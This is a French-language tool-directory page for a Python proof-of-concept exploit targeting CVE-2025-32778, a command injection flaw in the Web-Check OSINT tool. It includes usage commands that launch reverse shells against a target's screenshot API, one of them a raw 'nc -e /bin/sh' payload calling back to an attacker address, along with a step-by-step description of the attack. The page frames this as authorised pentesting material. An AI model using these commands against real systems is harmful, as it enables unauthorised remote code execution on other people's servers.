Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32778 — Exploit PoC pour CVE-2025-32778 : injection de commande dans l'outil OSINT Web-Check | Kitploit
Outils/GitHubGitHub/00xcanelo/cve-2025-32778
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

Exploit PoC pour CVE-2025-32778 : injection de commande dans l'outil OSINT Web-Check

Voir le dépôt
3149il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32778 - Exploitation d'injection de commandes Web-Check

Critical Language: Python

Description

CVE-2025-32778 est une vulnérabilité critique d'injection de commandes dans l'outil OSINT Web-Check de Lissy93.
Elle permet à des attaquants non authentifiés d'exécuter des commandes système arbitraires via le paramètre url dans l'API de capture d'écran.

Ce script Python automatise l'exploitation et peut générer des shells inversés ou accepter des charges utiles personnalisées.


Avertissement

  • Testez uniquement sur des systèmes que vous possédez ou pour lesquels vous êtes autorisé à tester.
  • Toute utilisation non autorisée est illégale et contraire à l'éthique.

Fonctionnalités

  • Exploite l'injection de commande dans Web-Check.
url
  • Prend en charge :
    • Shell inversé avec --lhost et --lport.
    • Shell personnalisé via --shell.
  • Normalisation d'URL.
  • Empêche la combinaison de --shell avec --lhost/--lport.

  • Prérequis

    • Python 3.x
    • Bibliothèque Requests :
    root@kitploit:~
    pip install requests
    

    Utilisation

    root@kitploit:~
    git clone https://github.com/00xCanelo/CVE-2025-32778
    cd CVE-2025-32778
    

    Générer un shell inversé avec l'outil

    root@kitploit:~
    python3 cve-2025-32778.py -u http://cible.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
    

    Charge utile de shell personnalisée (brute)

    root@kitploit:~
    python3 cve-2025-32778.py -u http://cible.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
    

    Menu d'aide

    root@kitploit:~
    python3 cve-2025-32778.py -h
    

    Comment ça fonctionne

    1. Normalise l'URL cible en scheme://host[:port].

    2. Prépare la charge utile :

      • Génère un shell inversé en utilisant --lhost et --lport.
      • Ou utilise une commande shell brute avec --shell.
    3. Encode la charge utile du shell pour une injection sécurisée dans l'URL.

    4. Envoie une requête HTTP GET vers /api/screenshot/ avec la charge utile.

    5. Attend la connexion du shell inversé.


    🧑‍💻 Auteur

    00xCanelo
    Profil GitHub


    Références

    • Dépôt GitHub Web-Check – Projet original contenant le code vulnérable.
    • CVE-2025-32778 – Entrée CVE décrivant la vulnérabilité d'injection de commandes.
    Télécharger l’outil